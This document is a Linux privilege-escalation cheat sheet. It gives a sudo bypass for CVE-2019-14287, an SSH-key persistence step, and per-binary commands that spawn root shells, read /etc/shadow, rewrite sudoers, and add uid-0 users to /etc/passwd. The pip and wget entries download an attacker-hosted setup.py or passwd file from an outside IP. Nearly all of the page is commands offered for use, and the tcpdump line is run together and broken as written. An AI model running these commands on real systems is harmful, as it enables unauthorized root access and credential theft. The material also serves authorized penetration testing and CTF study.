Abusing Sudo Rights

Resources

https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/

https://gtfobins.github.io/

CVE-2019-14287 (sudo < 1.8.28)

# Exploitable when sudo is older than 1.8.28 and a user has the following rule in sudo -l (root is excluded, but the uid check can be bypassed)
(ALL, !root) ALL

# If you have a full TTY, you can exploit it like this (uid -1, or its unsigned form 4294967295, resolves to uid 0)
sudo -u#-1 /bin/bash

# If you have no TTY (e.g. a web shell), get one first: put your public key in the
# current user's ~/.ssh/authorized_keys, SSH in, then run the bypass from that session.
# The sshd restart is only needed if the daemon is not already running; plain "sudo"
# targets root, which the rule above denies, so on a vulnerable sudo prefix it with -u#-1 as well.
mkdir -p ~/.ssh && echo 'ssh-rsa AAAA[...snip...]fd48as= root@kali-jms' >> ~/.ssh/authorized_keys
sudo /etc/init.d/ssh restart
sudo -u#-1 bash

Exploiting sudo

Entries below are keyed by the binary that sudo -l allows. Where a command uses "sudo -u user", substitute the account the rule grants (omit -u to run as root). Several methods write helper scripts or overwrite system files; keep track of what you changed so it can be reverted.

Binary program | Commands | Infos

apache2

sudo apache2 -f /etc/shadow

# apache2 fails to parse the file and the error message prints its first line (root's hash); one line per run

apt-get

sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh

awk

sudo awk 'BEGIN {system("/bin/sh")}'

ed

sudo /usr/bin/ed
!/bin/sh        # typed at the ed prompt

find

sudo find /etc/passwd -exec /bin/sh \;
sudo find /bin -name nano -exec /bin/sh \;   # same idea with a different search; -exec runs once per match

ftp

sudo ftp
ftp> !/bin/bash

gdb

sudo -u user gdb -q
(gdb) shell

git

# Method 1: run a script of your own as the pager
sudo -u user git -c core.pager=/tmp/script.sh --paginate help
# Method 2: git help opens the man page in a pager; break out from there
sudo git help add
!/bin/bash

# Method 1: create /tmp/script.sh containing "/bin/bash >&2 0>&2" and make it executable (chmod +x; avoid 777, anyone on the box could edit it before sudo runs it)
# Method 2: the !command escape belongs to the pager (less), so it relies on the man page being shown through a pager that allows shell escapes

ht

export TERM=xterm-color
sudo ht /etc/sudoers
# F3 opens the file; add a line such as "user ALL=(ALL) NOPASSWD: ALL", then save

less

sudo less /etc/hosts
!sh

man

sudo man man
!sh

more

sudo more /etc/hosts
!sh

mount

sudo mount -o bind /bin/bash /bin/mount
sudo mount
# bind-mounts bash over the mount binary, so "sudo mount" now starts a root shell; umount /bin/mount afterwards to restore it

mysql

sudo mysql -e '\! /bin/sh'   # \! is the mysql client's shell-escape command

nano

sudo nano /etc/passwd

# Add a uid-0 user: generate a hash, then append a passwd line that uses it
openssl passwd -1 -salt user3 pass123
# /etc/passwd
user3:<hash from openssl>:0:0:root:/root:/bin/bash
# (a line with an empty password field, user3::0:0:root:/root:/bin/bash, only lets you log in where PAM permits empty passwords)

nmap

# Method 1: interactive mode (only present in nmap 2.02 to 5.21; terminal echo is off in the resulting shell)
sudo nmap --interactive
nmap> !sh
# Method 2: NSE script (works on current versions)
echo "os.execute('/bin/sh')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse

# Method 1 uses --interactive, which later versions removed; Method 2 uses --script

pico

sudo -u user pico -s /bin/sh

# -s sets the spell-checker program (see GTFOBins); type a word in the editor and press ^T to run it

pip

# attacker side: serve a malicious setup.py (python3 -m http.server 80 where python2 is gone)
python -m SimpleHTTPServer 80
# target side
wget http://192.168.1.134/setup.py
sudo pip install . --upgrade --force-reinstall

# setup.py runs arbitrary code at install time; FakePip (https://github.com/0x00-0x00/FakePip.git) generates one. Decode it and change the callback IP address.

rbash

# Escaping rbash (restricted shell); not a sudo technique as such
echo $SHELL
echo $PATH
export SHELL=/bin/bash:$SHELL   # rbash normally refuses to change SHELL/PATH; the vi escape below is what does the work
export PATH=/usr/bin:$PATH
vi
:!/bin/bash

rvim

rvim --version | grep python   # rvim blocks :! but not scripting languages it was built with

echo "import os;os.system('bash')" > /tmp/script.py
sudo rvim -c "pyfile /tmp/script.py"   # use py3file if only +python3 is compiled in

scp

sudo -u user scp -vv -C -S /tmp/script.sh a whatever:

# Create /tmp/script.sh containing "/bin/bash >&2 0>&2" and make it executable; -S names the program scp runs in place of ssh, which it only invokes for a remote-style destination (hence the trailing colon, as in the GTFOBins example)

script

sudo -u user script /tmp/what-ever   # spawns a shell and records the session into that file

ssh

sudo -u user ssh -o ProxyCommand=/tmp/script.sh lel

# Create /tmp/script.sh containing "/bin/bash >&2 0>&2" and make it executable; ssh runs the ProxyCommand before connecting, so the hostname (lel) is just a placeholder

strace / sysud64

sudo strace -o /dev/null /bin/bash
sudo sysud64 -o /dev/null /bin/bash

tar

# Method 1: the checkpoint action runs a command while archiving
sudo -u user tar --checkpoint=1 --checkpoint-action=exec=/bin/bash -cf /tmp/12345.tar /dev/zero
# Method 2: replace the tar binary (also needs sudo for chown/mv; restore /bin/tar from /bin/tar.bak afterwards)
cd /tmp
cp /bin/bash .
sudo chown root:root /tmp/bash
sudo mv /bin/tar /bin/tar.bak
sudo mv /tmp/bash /bin/tar
sudo /bin/tar

tcpdump

echo $’id\ncat /etc/shadow’ > /tmp/.test chmod +x /tmp/.test sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

teehee

echo "raaj::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

# teehee is a CTF rename of tee; sudo tee -a works the same way. The appended line is a uid-0 account with an empty password, which only logs in where PAM permits that.

vim

sudo vim -c '!sh'

wget

sudo wget http://ip/filePasswd -O /etc/passwd
su user1

# Attacker side: copy the target's /etc/passwd, add a new uid-0 user line, and host the file. -O overwrites the whole file, so keep every existing entry or you will lock out the box.

zip

# Method 1: -TT runs a command of your choice to "test" the archive
touch /tmp/xyz; chmod 444 /tmp/xyz
sudo -u user zip /tmp/zzz.zip /tmp/xyz -T -TT /tmp/script.sh
# Method 2: same idea via --unzip-command
touch /tmp/raj
sudo zip /tmp/nisha.zip /tmp/raj -T --unzip-command="sh -c /bin/bash"

# Create /tmp/script.sh containing "/bin/bash >&2 0>&2" and make it executable (chmod +x rather than 777)
